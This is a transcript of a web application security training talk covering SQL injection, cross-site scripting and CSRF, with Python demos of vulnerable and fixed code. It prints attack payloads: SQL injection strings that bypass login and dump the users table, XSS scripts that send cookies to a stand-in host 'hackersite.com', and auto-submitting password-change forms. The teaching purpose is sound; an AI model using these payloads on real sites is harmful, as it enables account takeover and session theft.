Transcript of: Security Applications · 2018-11-13 · Cross-Site Request Forg...
© Grzegorz Goławski (@ggolawski)
Web Applications Security
Grzegorz Goławski (@ggolawski)
SQL Injection: Did you know?

- SQL Injection is still the most popular vulnerability
- Leads to the biggest data breaches
- Heartland Payment Systems: 130 million credit card details stolen
SQL Injection: Bypassing authentication

    // Vulnerable: the request parameters are concatenated straight into the SQL text
    String username = request.getParameter("username");
    String password = request.getParameter("password");
    result = stmt.executeQuery("SELECT * FROM users WHERE username = '" + username
            + "' AND password = '" + password + "' LIMIT 1");
    if (result.next()) {
        // User authenticated
    } else {
        // Authentication failure
    }
SQL Injection: Bypassing authentication

Legitimate input:
    username = admin
    password = Pa$$w0rd

Query template:
    SELECT * FROM users WHERE username = '{{username}}' AND password = '{{password}}' LIMIT 1

Resulting query:
    SELECT * FROM users WHERE username = 'admin' AND password = 'Pa$$w0rd' LIMIT 1
SQL Injection: Bypassing authentication

Malicious input:
    username = admin
    password = ' OR '1'='1' --

Query template:
    SELECT * FROM users WHERE username = '{{username}}' AND password = '{{password}}' LIMIT 1

Resulting query:
    SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'='1' --' LIMIT 1

The OR makes the WHERE clause true for every row and the comment marker (--) discards the rest of the statement, so the first row comes back and the check below passes without a valid password:

    if (result.next()) {
        // User authenticated
    } else {
        // Authentication failure
    }
SQL Injection: Retrieving sensitive data

Legitimate input:
    model = Golf

Query template:
    SELECT * FROM cars WHERE owner = 'user1' AND model = '{{model}}'

Resulting query:
    SELECT * FROM cars WHERE owner='user1' AND model='Golf'
SQL Injection: Retrieving sensitive data

Malicious input:
    model = ' OR 1=1 --

Query template:
    SELECT * FROM cars WHERE owner = 'user1' AND model = '{{model}}'

Resulting query:
    SELECT * FROM cars WHERE owner='user1' AND model='' OR 1=1 --'

The condition is now true for every row, so the query returns all cars, not only those owned by user1.
SQL Injection: Retrieving sensitive data

Can we retrieve data from another, more interesting table? Yes! How? With the UNION operator.

Malicious input:
    model = x' UNION SELECT * FROM users --

Query template:
    SELECT * FROM cars WHERE owner='user1' AND model='{{model}}'

Resulting query:
    SELECT * FROM cars WHERE owner='user1' AND model='x' UNION SELECT * FROM users --'
SQL Injection Protection: Parameters Binding

Still vulnerable (the value is concatenated into the SQL text before the statement is prepared):
    String query = "SELECT * FROM users WHERE username = '" + username + "'";
    PreparedStatement pstmt = connection.prepareStatement(query);

Safe (the value is bound to a placeholder and never parsed as SQL):
    String query = "SELECT * FROM users WHERE username = ?";
    PreparedStatement pstmt = connection.prepareStatement(query);
    pstmt.setString(1, username);
Parameters Binding: How does it work?

Malicious input:
    username = ' OR 1=1 --

    String query = "SELECT * FROM users WHERE username = ?";
    PreparedStatement pstmt = connection.prepareStatement(query);
    pstmt.setString(1, username);

Effective query:
    SELECT * FROM users WHERE username = ''' OR 1=1 --'
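The concatenated and the bound versions of the slides' queries, run side by side against a constructed in-memory SQLite database. This is an added example, not code from the talk: Python's sqlite3 module stands in for JDBC, and its '?' placeholders bind parameters the same way PreparedStatement does.

```python
import sqlite3


def make_db():
    """Constructed in-memory database for the demo (not the talk's own data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'Pa$$w0rd')")
    conn.execute("CREATE TABLE cars (owner TEXT, model TEXT)")
    conn.execute("INSERT INTO cars VALUES ('user1', 'Golf'), ('user2', 'Passat')")
    return conn


def login_concat(conn, username, password):
    """Vulnerable: input is spliced into the SQL text, like the Java snippet above."""
    query = ("SELECT * FROM users WHERE username = '" + username
             + "' AND password = '" + password + "' LIMIT 1")
    return conn.execute(query).fetchone() is not None


def login_bound(conn, username, password):
    """Safe: '?' placeholders; the values travel separately and are never parsed as SQL."""
    query = "SELECT * FROM users WHERE username = ? AND password = ? LIMIT 1"
    return conn.execute(query, (username, password)).fetchone() is not None


def cars_concat(conn, owner, model):
    """Vulnerable: a UNION inside 'model' pulls rows out of another table."""
    query = ("SELECT * FROM cars WHERE owner = '" + owner
             + "' AND model = '" + model + "'")
    return conn.execute(query).fetchall()


def cars_bound(conn, owner, model):
    """Safe: the whole 'model' string is matched literally against the column."""
    query = "SELECT * FROM cars WHERE owner = ? AND model = ?"
    return conn.execute(query, (owner, model)).fetchall()


if __name__ == "__main__":
    db = make_db()
    bypass = "' OR '1'='1' --"                 # the password payload from the slides
    union = "x' UNION SELECT * FROM users --"  # the model payload from the slides
    print("concat login:", login_concat(db, "admin", bypass))  # True  (bypassed)
    print("bound login: ", login_bound(db, "admin", bypass))   # False (rejected)
    print("concat cars: ", cars_concat(db, "user1", union))    # users table leaks
    print("bound cars:  ", cars_bound(db, "user1", union))     # []
```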
SQL Injection: Summary

- Number 1 security vulnerability in web applications
- Can lead to unauthorized access, data breaches and/or database alteration
- Prevention: parameters binding (prepared statements)
Injection: References

- OWASP Proactive Controls: 2. Parameterize Queries
- OWASP Application Security Verification Standard: V5 Input validation and output encoding
- Testing for SQL Injection
- Testing for Command Injection
- Testing for ORM Injection
- OWASP Injection Prevention Cheat Sheet
- OWASP SQL Injection Prevention Cheat Sheet
- OWASP Injection Prevention Cheat Sheet in Java
- OWASP Query Parameterization Cheat Sheet
- CWE-77: Command Injection
- CWE-89: SQL Injection
- CWE-564: SQL Injection: Hibernate
- CWE-917: Expression Language Injection
- Server-Side Template Injection
Cross-Site Scripting (XSS)

Enables attackers to inject client-side script into web pages viewed by other users.

- Reflected (non-persistent) XSS: the XSS payload is included in the URL and reflected on the web page
- Persistent XSS: the XSS payload is injected persistently into the application (e.g. into the database)
Reflected XSS

Legitimate input:
    id = 99

Template:
    <div>No car with id {id}</div>

Request and response:
    https://carsbook.com/car?id=99
    <div>No car with id 99</div>
Reflected XSS

Malicious input:
    id = <script>alert('xss')</script>

Template:
    <div>No car with id {id}</div>

Request and response:
    https://carsbook.com/car?id=<script>alert('xss')</script>
    <div>No car with id <script>alert('xss')</script></div>
What JavaScript payload would you send?
Persistent XSS

If input values being stored persistently are not validated, an attacker can enter malicious data, e.g. as a car name:

    Car name: <script>alert('xss')</script>

- When anyone loads the car's page, the malicious script runs
- The script will be executed every time anybody opens the page
- No need to send malicious links
XSS Payloads: Site defacement

    <script>
    var img = document.createElement("img");
    img.src = "https://hackersite.com/images/hacked.png";
    document.getElementById("car-list").insertBefore(img, document.getElementById("car-list").firstChild);
    </script>
XSS Payloads: Stealing cookies using iframe

    <script>
    document.write('' + '<iframe src="https://hackersite.com/log?cookie=' + document.cookie + '" height=0 width=0/>')
    </script>
XSS Payloads: Stealing cookies using XMLHttpRequest

    <script>
    var req = new XMLHttpRequest();
    req.open('GET', 'https://hackersite.com/log?cookie=' + document.cookie, false);
    req.send(null);
    </script>
XSS Payloads: How to inject JavaScript code without using <script>?

Event attributes, e.g. onerror:
    <img src="nonexisting" onerror="alert('xss')">
XSS Protection: Encoding

    Character   Encoded
    &           &amp;
    <           &lt;
    >           &gt;
    "           &quot;
    '           &#x27;
    /           &#x2F;

Good news: modern frameworks do this for you
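The encoding table above applied to the carsbook reflected-XSS example: the unsafe and the encoded rendering side by side, with the slides' payloads as input. Added example, not code from the talk; encode_for_html, render_car_page and has_injected_markup are names chosen here.

```python
import re

# The six characters and their encodings from the slide's table.
HTML_ENCODE = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
    "/": "&#x2F;",
}


def encode_for_html(value):
    """Encode untrusted text for an HTML element body or a quoted attribute value."""
    return "".join(HTML_ENCODE.get(ch, ch) for ch in str(value))


def render_car_page_unsafe(car_id):
    """The reflected-XSS version from the slides: the id is copied into the page as-is."""
    return "<div>No car with id " + str(car_id) + "</div>"


def render_car_page(car_id):
    """Fixed version: the id is encoded before it reaches the HTML."""
    return "<div>No car with id " + encode_for_html(car_id) + "</div>"


def has_injected_markup(html, template_tags=("div",)):
    """Demo check: any tag other than the template's own <div> means input became markup."""
    tags = {m.lower() for m in re.findall(r"</?([a-zA-Z][a-zA-Z0-9]*)", html)}
    return bool(tags - set(template_tags))


if __name__ == "__main__":
    payload = "<script>alert('xss')</script>"   # the id payload from the slides
    print(render_car_page_unsafe(payload), has_injected_markup(render_car_page_unsafe(payload)))
    print(render_car_page(payload), has_injected_markup(render_car_page(payload)))
```

This encoder is only right for HTML body and attribute contexts; a value placed inside a JavaScript string, a URL or a CSS rule needs the encoder for that context, which is what the OWASP Java Encoder Project listed in the references provides.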
XSS Example: Safari Books
XSS: Summary

- Reflected and persistent
- Can lead to site defacement, session cookie leakage or any JavaScript code execution in the victims' browsers
- Prevention: output encoding
Cross-Site Scripting (XSS): References

- OWASP Proactive Controls: 3. Encode Data; 4. Validate all inputs
- OWASP ASVS: V5 Input validation and output encoding
- Testing for Reflected Cross site scripting
- Testing for Stored Cross site scripting
- Testing for DOM-based Cross site scripting
- XSS Prevention Cheat Sheet
- DOM based XSS Prevention Cheat Sheet
- XSS Filter Evasion Cheat Sheet
- OWASP Java Encoder Project
- CWE-79: XSS
- Client-side template injection
- Content Security Policy (CSP)
- Subresource Integrity (SRI)
Do you remember what the 3rd vulnerability is?
Cross-Site Request Forgery (CSRF)

- Occurs when an attacker causes a user's web browser to perform an unwanted action on a trusted site for which the user is currently authenticated
- Possible because browsers automatically include any credentials associated with the site, such as the user's session cookie
- The site has no way to distinguish between the forged and legitimate requests
CSRF Example

The attacker must trick the victim's browser into sending the crafted HTTP request:
- By clicking the malicious link
- By visiting a malicious site containing a fake image
- By visiting the trusted site vulnerable to an XSS attack, where the malicious link or image can be injected

    <a href="https://carsbook.com/changePassword?password=pwd">Click me!</a>
    <img src="https://carsbook.com/changePassword?password=pwd" width="0" height="0" border="0">
CSRF Example

What if the application uses POST?

    <form action="https://carsbook.com/user/changePassword" method="POST">
      <input type="hidden" name="password" value="pwd">
      <input type="submit" value="View my pictures">
    </form>

But this requires the user to click the submit button, unless the page submits the form by itself on load:

    <body onload="document.forms[0].submit()">
CSRF Prevention: Unpredictable token

- Embed an additional token into requests
- Validate the token on the server side

    <form action="/user/changePassword" method="POST">
      <input type="hidden" name="csrftoken" value="KbyUmhTLMpYj7CD2di7JKP1P3q">
      ...
    </form>
CSRF Prevention: Double submit cookie

- The web application sets a cookie with a random token
- JavaScript on the client side reads it and copies it into a custom HTTP header
- Compare the tokens from the cookie and the HTTP header on the server side
- No need to store tokens on the server side

    Set-Cookie: token=i8XNjC4b8KVouwha7867g32KG63jGT1M; expires=[...]; Max-Age=31449600; Path=/
    X-Csrf-Token: i8XNjC4b8KVouwha7867g32KG63jGT1M
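Server-side checks for both prevention patterns from the two slides above, the unpredictable per-session token in the form and the double submit cookie compared against the X-Csrf-Token header. Added example, not code from the talk; the function names, the 24-byte token length and the minimal Cookie-header parser are choices made here.

```python
import hmac
import secrets

TOKEN_BYTES = 24  # assumption: 192 random bits per token


def new_csrf_token():
    """Unpredictable token from the OS CSPRNG; never derive it from a user id, time or counter."""
    return secrets.token_urlsafe(TOKEN_BYTES)


def tokens_match(expected, presented):
    """Constant-time comparison; a missing token on either side is a failure, never a bypass."""
    if not expected or not presented:
        return False
    return hmac.compare_digest(expected.encode("utf-8"), presented.encode("utf-8"))


def check_synchronizer_token(session, form):
    """Unpredictable token pattern: the 'csrftoken' field must equal the token kept in the session."""
    return tokens_match(session.get("csrftoken"), form.get("csrftoken"))


def parse_cookie_header(header):
    """Split a request Cookie header ('a=1; b=2') into a dict (minimal parser for the demo)."""
    cookies = {}
    for part in (header or "").split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


def check_double_submit(headers):
    """Double submit pattern: the 'token' cookie must equal X-Csrf-Token; nothing is stored server side."""
    cookie_token = parse_cookie_header(headers.get("Cookie")).get("token")
    return tokens_match(cookie_token, headers.get("X-Csrf-Token"))


if __name__ == "__main__":
    token = "i8XNjC4b8KVouwha7867g32KG63jGT1M"  # the token value from the slide
    print(check_double_submit({"Cookie": "token=" + token, "X-Csrf-Token": token}))  # True
    print(check_double_submit({"Cookie": "token=" + token}))                         # False
```

The double submit check trusts that only the site's own JavaScript can read the cookie, so it gives no protection once the site has an XSS bug, which is the third delivery route on the CSRF example slide.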
CSRF: Summary

- Perform an unwanted action on the target web site without the user's knowledge
- Can lead to execution of any action allowed on the web site
- Prevention: unpredictable token or double submit cookie
Cross-Site Request Forgery: References

- CSRF Attack
- Reviewing code for Cross-Site Request Forgery issues
- CSRF Prevention Cheat Sheet
- Testing for CSRF
- OWASP CSRFGuard Project
- CWE-352: Cross-Site Request Forgery
Go to your code and fix it!

Thank You!